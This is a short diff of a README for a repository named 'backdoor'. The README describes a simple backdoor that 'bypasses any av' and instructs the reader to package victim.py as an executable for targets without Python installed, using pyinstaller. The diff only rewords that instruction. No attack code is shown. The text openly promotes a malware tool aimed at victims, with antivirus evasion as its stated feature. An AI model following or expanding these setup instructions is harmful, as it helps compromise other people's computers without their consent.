jaaabir/backdoor/README.md

 it's a simple backdoor which bypasses any av

-make sure to convert the victim.py into victim.exe if the target doesn't dont have py installed
+make sure to convert the victim.py into victim.exe if you are not sure the target doesn't have py installed

 goto cmd/terminal > pip install pyinstall